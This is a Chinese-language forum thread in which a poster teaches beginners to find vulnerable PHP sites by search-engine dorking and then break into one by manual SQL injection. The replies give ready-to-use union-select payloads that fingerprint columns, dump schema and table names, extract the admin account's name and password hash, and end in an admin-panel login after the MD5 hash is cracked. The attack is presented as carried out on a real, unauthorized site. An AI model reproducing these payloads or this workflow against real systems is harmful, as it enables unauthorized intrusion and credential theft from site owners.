首页 > 编程源码 > (小白必看)sql网站渗透纯手工注入思路

(小白必看)sql网站渗透纯手工注入思路

楼主:墨水带你说娱乐 [1级] · 发表于2019-9-10 · 1739次浏览 · 编程源码 ID:

学习了 这么就的基础,也应该实战了 我们用MySQL手工注入,也算是基础吧,于是乎就通过inurl:.php?id=方式挨个的踩点来实战下,运气还算是不错的,找到了一个站点。

下面开启

- 版权声明 - 1、本帖所有言论和图片等纯属网友个人意见,与流星社区立场无关;
2、其他单位或个人使用、转载或引用本帖时必须同时征得该帖子作者墨水带你说娱乐流星社区的同意;
3、备注原文地址:https://bbs.liuxingw.com/t/13712.html,可忽略第2条;
4、帖子作者需承担一切因本文发表而直接或间接导致的相关责任;
5、如本帖内容或部分内容转载自其它媒体,这并不代表本站赞同其观点和对其真实性负责;
6、如本帖若为资源类,将仅限用于学习和研究目的,您必须在下载后的24个小时之内,从您安装或使用的设备中彻底删除上述内容;
7、如果您喜欢该程序,请支持正版软件,购买注册,可以得到更好的正版服务;
8、如本帖侵犯到任何版权或违法问题,请立即邮件告知我们,我们将及时予以处理。

打赏楼主,让Ta更有动力发帖~

28条回复 |  最后回复于2019-9-10

墨水带你说娱乐 [1级]   回复于2019-9-10

对你肯定是没价值,但是对小白就不一定了,流星啥子不多就小白多

回复列表

  • 内容加载中...

请输入回复内容

墨水带你说娱乐 [1级]   回复于2019-9-10

' and ' 1 '= ' 2页面错误,判断该URL存在sql注入

回复列表

  • 内容加载中...

请输入回复内容

墨水带你说娱乐 [1级]   回复于2019-9-10

接下来通过order by 语句来判断列数也就是字段数 得知列数为16列
语句如下:http://xxoo.com/show.php?cid=25&classid=8&id=44' order by 16%23 页面返回正常 这里%23是#的URL编码起到注释作用

回复列表

  • 内容加载中...

请输入回复内容

墨水带你说娱乐 [1级]   回复于2019-9-10

接着就是通过union select 联合查询语句查询页面回显位置来暴数据库,表名,字段名,数据等。
语句如下:http://xxoo.com/show.php?cid=25&classid=8&id=-44' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23

回复列表

  • 内容加载中...

请输入回复内容

墨水带你说娱乐 [1级]   回复于2019-9-10

过页面返回得知在2,4,3位置可以返回我们所需要的数据。
暴库语句:http://xxoo.com/show.php?cid=25&classid=8&id=-44' union select 1,(select group_concat(schema_name) from information_schema.schemata),3,4,5,6,7,8,9,10,11,12,13,14,15,16%23

回复列表

  • 内容加载中...

请输入回复内容

墨水带你说娱乐 [1级]   回复于2019-9-10

得到数据库:my4400038,
继续暴my4400038数据库中表。
暴表名语句:http://xxoo.com/show.php?cid=25&classid=8&id=-44' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='my4400038'),3,4,5,6,7,8,9,10,11,12,13,14,15,16%23.

回复列表

  • 内容加载中...

请输入回复内容

墨水带你说娱乐 [1级]   回复于2019-9-10

继续~~
暴f_admin表中字段名。(图一)

接下里就是暴表中name和passwd数据(图二)

回复列表

  • 内容加载中...

请输入回复内容

墨水带你说娱乐 [1级]   回复于2019-9-10

语句:http://xxoo.com/show.php?cid=25&classid=8&id=-441' union select 1,(select concat_ws('~~~~~~',name,passwd) from f_admin),3,4,5,6,7,8,9,10,11,12,13,14,15,16%23

账号:admin
最后md5解密:3211003


后台随手一个admin登陆之~~
本篇文件没什么技术含量,只要掌握了sql语句注入的流程,即可轻松拿下,本人也只是业余爱好而已,目前努力学习中教程结束

回复列表

  • 内容加载中...

请输入回复内容
登录后才可进行评论
签到
49人签到
已签0天
  • 40978帖子
  • 1864739热点量
  • 529332火热值